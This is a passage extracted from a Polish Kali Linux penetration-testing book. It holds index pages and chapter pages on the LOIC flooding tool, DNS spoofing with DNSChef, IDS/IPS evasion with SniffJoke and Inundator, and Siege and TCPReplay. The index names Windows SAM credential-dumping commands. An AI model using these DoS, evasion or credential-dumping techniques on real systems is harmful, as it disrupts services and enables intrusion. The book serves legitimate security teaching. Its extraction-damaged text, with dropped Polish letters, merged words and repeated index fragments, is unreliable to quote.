bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
